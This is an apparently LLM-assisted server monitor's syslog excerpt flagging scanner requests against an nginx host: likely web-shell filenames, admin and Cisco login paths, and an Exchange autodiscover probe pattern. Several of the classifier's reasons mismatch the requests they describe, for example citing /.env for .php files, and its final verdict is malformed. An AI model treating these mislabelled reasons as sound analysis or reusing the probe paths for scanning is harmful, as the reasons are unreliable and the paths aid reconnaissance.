Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.705259 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.704970030Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /56c53.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.773654 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.773422396Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /56c53.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.841119 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.840507455Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /public/file.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.909098 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.908772129Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /public/file.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.976896 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.976538232Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /144.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.045798 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:46.045526983Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /144.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.116436 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:46.116116549Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /clss.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.185004 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:46.184747777Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /clss.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.291356 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:46.291076832Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /motu.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.359189 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:46.358923380Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /motu.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.470140 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:46.469879597Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /ajax.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.538132 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:46.537893214Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /ajax.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.605193 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:46.604906832Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /maul.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.673278 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:46.673028307Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /maul.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.019076 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:47.018826324Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /public/wp-blog.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.096377 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:47.096122901Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /public/wp-blog.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.163877 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:47.163607167Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /wp-content/radio.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.231614 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:47.231342798Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /wp-content/radio.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.520175 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:47.519914548Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /callback.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.588797 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:47.588317943Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /callback.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.655664 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:47.655402686Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /166.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.725546 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:47.725259696Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /166.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:12:01.948771 [observer] Pipeline: processed=3716 pattern_hits=3645 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:12:01.955929 [observer] Patterns: hash=3645 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:12:31.935455 [observer] Pipeline: processed=3720 pattern_hits=3649 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:12:31.935485 [observer] Patterns: hash=3649 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:13:01.944109 [observer] Pipeline: processed=3723 pattern_hits=3652 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:13:01.944136 [observer] Patterns: hash=3652 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:13:31.935720 [observer] Pipeline: processed=3727 pattern_hits=3656 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:13:31.935746 [observer] Patterns: hash=3656 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:14:01.942737 [observer] Pipeline: processed=3729 pattern_hits=3658 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:14:01.942763 [observer] Patterns: hash=3658 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:14:31.951831 [observer] Pipeline: processed=3732 pattern_hits=3661 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:14:31.951858 [observer] Patterns: hash=3661 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:15:01.944380 [observer] Pipeline: processed=3737 pattern_hits=3666 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:15:01.944415 [observer] Patterns: hash=3666 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:15:31.934910 [observer] Pipeline: processed=3739 pattern_hits=3668 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:15:31.934941 [observer] Patterns: hash=3668 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:15:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:15:47.743330 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T09:15:47.743019798Z 216.180.246.228 - - [20/Mar/2026:09:15:47 +0000] "_" "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xED\xF4LC\xE2\x17Yt \xF0`U\xF9\xD83oU{\xCF\xC2Pgv^y\x03\xFC\xD14\xF3\x...
Mar 20 09:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:16:01.977940 [observer] Pipeline: processed=3744 pattern_hits=3673 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:16:01.977981 [observer] Patterns: hash=3673 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:16:31.944879 [observer] Pipeline: processed=3746 pattern_hits=3675 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:16:31.944905 [observer] Patterns: hash=3675 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:17:01.936301 [observer] Pipeline: processed=3752 pattern_hits=3681 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:17:01.936324 [observer] Patterns: hash=3681 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:17:31.944037 [observer] Pipeline: processed=3754 pattern_hits=3683 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:17:31.944069 [observer] Patterns: hash=3683 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:18:01.953909 [observer] Pipeline: processed=3756 pattern_hits=3685 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:18:01.954018 [observer] Patterns: hash=3685 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:18:31.934258 [observer] Pipeline: processed=3760 pattern_hits=3689 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:18:31.934281 [observer] Patterns: hash=3689 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:01.951183 [observer] Pipeline: processed=3762 pattern_hits=3691 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:01.951573 [observer] Patterns: hash=3691 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:19:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:15.722277 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 09:19:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:15.722314 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /manage/account/login resulted in a file not found error, which can indicate probing for admin/login paths or misconfigured routes. Line=2026-03-20T09:19:09.513202727Z 2026/03/20 09:19:09 [error] 422#422: *748025 open() "/usr/share/nginx/default/manage/account/login" failed (2: No such file or directory), client: 216.180.246.228, serve...
Mar 20 09:19:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:15.722417 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:19:09.513243381Z 216.180.246.228 - - [20/Mar/2026:09:19:09 +0000] "54.200.221.0" "GET /manage/account/login HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://...
Mar 20 09:19:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:21.038319 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 09:19:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:21.038371 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request targets admin/index.html and nginx cannot open the file; could indicate probing for admin assets or misconfiguration. Not definitive malicious but warrants monitoring. Line=2026-03-20T09:19:10.021210698Z 2026/03/20 09:19:10 [error] 422#422: *748025 open() "/usr/share/nginx/default/admin/index.html" failed (2: No such file or directory), client: 216.180.246.228, server: _...
Mar 20 09:19:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:21.038430 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:19:10.021265044Z 216.180.246.228 - - [20/Mar/2026:09:19:10 +0000] "54.200.221.0" "GET /admin/index.html HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www....
Mar 20 09:19:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:26.934608 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 09:19:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:26.934649 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a path containing +CSCOE+ in an nginx error log is unusual and may indicate probing for vulnerable Cisco components or misconfigured paths. Line=2026-03-20T09:19:15.247605791Z 2026/03/20 09:19:15 [error] 422#422: *748025 open() "/usr/share/nginx/default/+CSCOE+/logon.html" failed (2: No such file or directory), client: 216.180.246.228, server:...
Mar 20 09:19:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:26.934702 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:19:15.247670092Z 216.180.246.228 - - [20/Mar/2026:09:19:15 +0000] "54.200.221.0" "GET /+CSCOE+/logon.html HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://ww...
Mar 20 09:19:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:30.685686 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 09:19:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:30.685734 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to CGI script login.cgi in /cgi-bin may indicate probing for vulnerable CGI endpoints; the file missing indicates potential exploratory behavior rather than a legitimate request. Line=2026-03-20T09:19:18.484422139Z 2026/03/20 09:19:18 [error] 422#422: *748025 open() "/usr/share/nginx/default/cgi-bin/login.cgi" failed (2: No such file or directory), client: 216.180.246.228, server: ...
Mar 20 09:19:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:30.685785 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:19:18.484464998Z 216.180.246.228 - - [20/Mar/2026:09:19:18 +0000] "54.200.221.0" "GET /cgi-bin/login.cgi HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www...
Mar 20 09:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:31.937639 [observer] Pipeline: processed=3776 pattern_hits=3701 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:31.937667 [observer] Patterns: hash=3701 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:20:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:20:02.045678 [observer] Pipeline: processed=3778 pattern_hits=3703 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:20:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:20:02.045711 [observer] Patterns: hash=3703 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:20:31.934135 [observer] Pipeline: processed=3782 pattern_hits=3707 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:20:31.934175 [observer] Patterns: hash=3707 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:21:01.940971 [observer] Pipeline: processed=3784 pattern_hits=3709 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:21:01.941000 [observer] Patterns: hash=3709 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:21:31.934736 [observer] Pipeline: processed=3786 pattern_hits=3711 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:21:31.934760 [observer] Patterns: hash=3711 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:22:01.972437 [observer] Pipeline: processed=3790 pattern_hits=3715 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:22:01.973749 [observer] Patterns: hash=3715 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:22:31.948491 [observer] Pipeline: processed=3794 pattern_hits=3719 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:22:31.948517 [observer] Patterns: hash=3719 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:23:01.938179 [observer] Pipeline: processed=3798 pattern_hits=3723 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:23:01.938745 [observer] Patterns: hash=3723 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:23:31.943702 [observer] Pipeline: processed=3800 pattern_hits=3725 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:23:31.943729 [observer] Patterns: hash=3725 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:24:01.944482 [observer] Pipeline: processed=3804 pattern_hits=3729 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:24:01.944525 [observer] Patterns: hash=3729 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:24:31.943586 [observer] Pipeline: processed=3806 pattern_hits=3731 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:24:31.943614 [observer] Patterns: hash=3731 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:25:01.954826 [observer] Pipeline: processed=3808 pattern_hits=3733 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:25:01.954856 [observer] Patterns: hash=3733 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:25:31.939869 [observer] Pipeline: processed=3812 pattern_hits=3737 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:25:31.939892 [observer] Patterns: hash=3737 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:26:01.963191 [observer] Pipeline: processed=3814 pattern_hits=3739 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:26:01.963231 [observer] Patterns: hash=3739 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:26:31.935468 [observer] Pipeline: processed=3818 pattern_hits=3743 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:26:31.935498 [observer] Patterns: hash=3743 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:27:01.964792 [observer] Pipeline: processed=3820 pattern_hits=3745 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:27:01.964819 [observer] Patterns: hash=3745 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:27:31.935665 [observer] Pipeline: processed=3826 pattern_hits=3751 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:27:31.935699 [observer] Patterns: hash=3751 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:01.998239 [observer] Pipeline: processed=3828 pattern_hits=3753 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:01.998304 [observer] Patterns: hash=3753 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:30.029350 [llm] Failed to parse verdict from: {
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]:   "classification": "safe",
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]:   "confidence": 0. nine,
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]:   "reason": "Normal HTTP GET request for robots.txt with 200 response, typical keep-alive style access log.",
